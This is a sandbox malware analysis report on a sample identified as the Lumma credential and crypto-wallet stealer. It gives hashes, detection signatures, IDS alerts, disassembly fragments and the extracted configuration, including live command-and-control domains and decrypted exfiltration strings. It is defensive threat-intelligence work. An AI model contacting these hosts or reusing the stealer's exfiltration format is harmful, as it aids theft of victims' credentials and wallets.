Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uU6IvUPN39.exe

Overview

General Information

Sample name:uU6IvUPN39.exe
renamed because original name is a hash value
Original sample name:a478b8943ef3239752d731e7290c4a3d.exe
Analysis ID:1586508
MD5:a478b8943ef3239752d731e7290c4a3d
SHA1:4d84b6e0e29f24609a5e47edb2e75a05871b2e8b
SHA256:3e1364322293b0e928397a936ef70d087273fb886bb910ded4dbc8f7085f8c60
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • uU6IvUPN39.exe (PID: 2960 cmdline: "C:\Users\user\Desktop\uU6IvUPN39.exe" MD5: A478B8943EF3239752D731E7290C4A3D)
    • WerFault.exe (PID: 5324 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 1820 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["versersleep.shop", "skidjazzyric.click", "handscreamny.shop", "femalsabler.shop", "robinsharez.shop", "crowdwarek.shop", "chipdonkeruz.shop", "apporholis.shop", "soundtappysk.shop"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1539359212.00000000006AA000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xf30:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: uU6IvUPN39.exe PID: 2960JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-09T08:43:35.571305+010020283713Unknown Traffic192.168.2.849706104.21.96.1443TCP
            2025-01-09T08:43:36.562488+010020283713Unknown Traffic192.168.2.849707104.21.96.1443TCP
            2025-01-09T08:43:38.043716+010020283713Unknown Traffic192.168.2.849708104.21.96.1443TCP
            2025-01-09T08:43:39.209528+010020283713Unknown Traffic192.168.2.849709104.21.96.1443TCP
            2025-01-09T08:43:40.747263+010020283713Unknown Traffic192.168.2.849710104.21.96.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-09T08:43:36.028845+010020546531A Network Trojan was detected192.168.2.849706104.21.96.1443TCP
            2025-01-09T08:43:37.320591+010020546531A Network Trojan was detected192.168.2.849707104.21.96.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-09T08:43:36.028845+010020498361A Network Trojan was detected192.168.2.849706104.21.96.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-09T08:43:37.320591+010020498121A Network Trojan was detected192.168.2.849707104.21.96.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-09T08:43:38.622693+010020480941Malware Command and Control Activity Detected192.168.2.849708104.21.96.1443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: uU6IvUPN39.exeAvira: detected
            Source: https://skidjazzyric.click/apij;Avira URL Cloud: Label: malware
            Source: https://skidjazzyric.click/Avira URL Cloud: Label: malware
            Source: https://skidjazzyric.click/XAvira URL Cloud: Label: malware
            Source: https://skidjazzyric.click:443/apiicrosoftAvira URL Cloud: Label: malware
            Source: https://skidjazzyric.click/&_Avira URL Cloud: Label: malware
            Source: https://skidjazzyric.click/EAvira URL Cloud: Label: malware
            Source: 0.3.uU6IvUPN39.exe.2180000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["versersleep.shop", "skidjazzyric.click", "handscreamny.shop", "femalsabler.shop", "robinsharez.shop", "crowdwarek.shop", "chipdonkeruz.shop", "apporholis.shop", "soundtappysk.shop"], "Build id": "4h5VfH--"}
            Source: uU6IvUPN39.exeVirustotal: Detection: 56%Perma Link
            Source: uU6IvUPN39.exeReversingLabs: Detection: 55%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: uU6IvUPN39.exeJoe Sandbox ML: detected
            Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmpString decryptor: robinsharez.shop
            Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmpString decryptor: handscreamny.shop
            Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmpString decryptor: chipdonkeruz.shop
            Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmpString decryptor: versersleep.shop
            Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmpString decryptor: crowdwarek.shop
            Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmpString decryptor: apporholis.shop
            Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmpString decryptor: femalsabler.shop
            Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmpString decryptor: soundtappysk.shop
            Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmpString decryptor: skidjazzyric.click
            Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00415720 CryptUnprotectData,0_2_00415720

            Compliance

            barindex
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeUnpacked PE file: 0.2.uU6IvUPN39.exe.400000.0.unpack
            Source: uU6IvUPN39.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49710 version: TLS 1.2
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx0_2_0043B870
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov edx, ecx0_2_0043B870
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov esi, ecx0_2_00415720
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, eax0_2_00415720
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h0_2_00419840
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]0_2_0040A05C
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h0_2_00427070
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0042D830
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h0_2_0043F0E0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0041B882
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then jmp eax0_2_004418A0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0041B173
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_0042B170
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0041A900
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0041B184
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then test esi, esi0_2_0043C9A0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [ecx], al0_2_0041B243
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042EA62
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]0_2_00402210
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, eax0_2_0040AA32
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]0_2_00425AF0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, eax0_2_00428280
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_0041F2A0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ebx, eax0_2_00405AB0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ebp, eax0_2_00405AB0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, edx0_2_0040B2B0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042EB5F
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0042BB00
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0041BB21
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h0_2_00441B20
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0041AB2A
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]0_2_0040C334
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+72B923DBh]0_2_0040C3EC
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ebx, edx0_2_0042DBF0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then jmp ecx0_2_0040D334
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_00422380
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]0_2_0041BBA0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h0_2_0042BBA0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042EBA1
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, eax0_2_00440BAB
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042EBB3
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h0_2_00441BB0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h0_2_00441C40
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, eax0_2_00442470
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h0_2_00426C76
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov eax, edi0_2_0041C400
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [esi], al0_2_00417405
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]0_2_00417405
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov edx, ecx0_2_00417405
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_00414C20
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h0_2_0044042D
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, eax0_2_0044042D
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0041B484
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov word ptr [esi], cx0_2_00427490
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h0_2_00425D6A
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00438520
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh0_2_00442D20
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then push edi0_2_0043C5A0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]0_2_0043C5A0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_0042B652
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0041B667
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]0_2_00418672
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00409E09
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00407620
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00407620
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then jmp ecx0_2_0040CEC7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]0_2_00416ED0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]0_2_0041BEE1
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0041AEFF
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]0_2_0040DFE2
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0040DFE2
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]0_2_00408F90
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh0_2_004427B0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]0_2_0213E249
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0213E249
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]0_2_0213A2C3
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h0_2_0216F347
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0214B3DA
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0214B3EB
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0213A070
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov esi, ecx0_2_021460EF
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]0_2_02147137
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then jmp ecx0_2_0213D12E
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]0_2_0214C148
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0214B166
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]0_2_021391F7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h0_2_021721EA
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then jmp ecx0_2_0213D59B
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov eax, edi0_2_0214C667
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h0_2_02170694
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, eax0_2_02170694
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, eax0_2_021726D7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov word ptr [esi], cx0_2_021576F7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0214B6EB
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0214773F
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_02168787
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]0_2_02132477
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [ecx], al0_2_0214B4AA
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, eax0_2_021584E7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_0214F507
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]0_2_0213C59B
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_021525E7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh0_2_02172A17
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, edx0_2_0213BA6C
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0215DA97
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h0_2_02149AA7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx0_2_0216BAD7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov edx, ecx0_2_0216BAD7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]0_2_02147AE4
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov edx, ecx0_2_02147AE4
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0214BAE9
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0214AB67
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h0_2_02156BA7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then push edi0_2_0216C807
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]0_2_0216C807
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]0_2_02148809
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_02137887
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_02137887
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_0215B8B5
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_021458FA
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, eax0_2_02170E12
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0215EE1A
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h0_2_0215BE07
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0215EE08
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]0_2_0214BE2C
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ebx, edx0_2_0215DE57
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh0_2_02172F87
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then test esi, esi0_2_0216CC07
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then jmp eax0_2_02171C3E
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, eax0_2_0213AC99
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0215ECC9
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ecx, eax0_2_02146D15
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ebx, eax0_2_02135D17
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ebp, eax0_2_02135D17
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]0_2_02155D57
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0215BD67
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0214AD91
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0214BD88
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0215EDC6

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49707 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49708 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.96.1:443
            Source: Malware configuration extractorURLs: versersleep.shop
            Source: Malware configuration extractorURLs: skidjazzyric.click
            Source: Malware configuration extractorURLs: handscreamny.shop
            Source: Malware configuration extractorURLs: femalsabler.shop
            Source: Malware configuration extractorURLs: robinsharez.shop
            Source: Malware configuration extractorURLs: crowdwarek.shop
            Source: Malware configuration extractorURLs: chipdonkeruz.shop
            Source: Malware configuration extractorURLs: apporholis.shop
            Source: Malware configuration extractorURLs: soundtappysk.shop
            Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.96.1:443
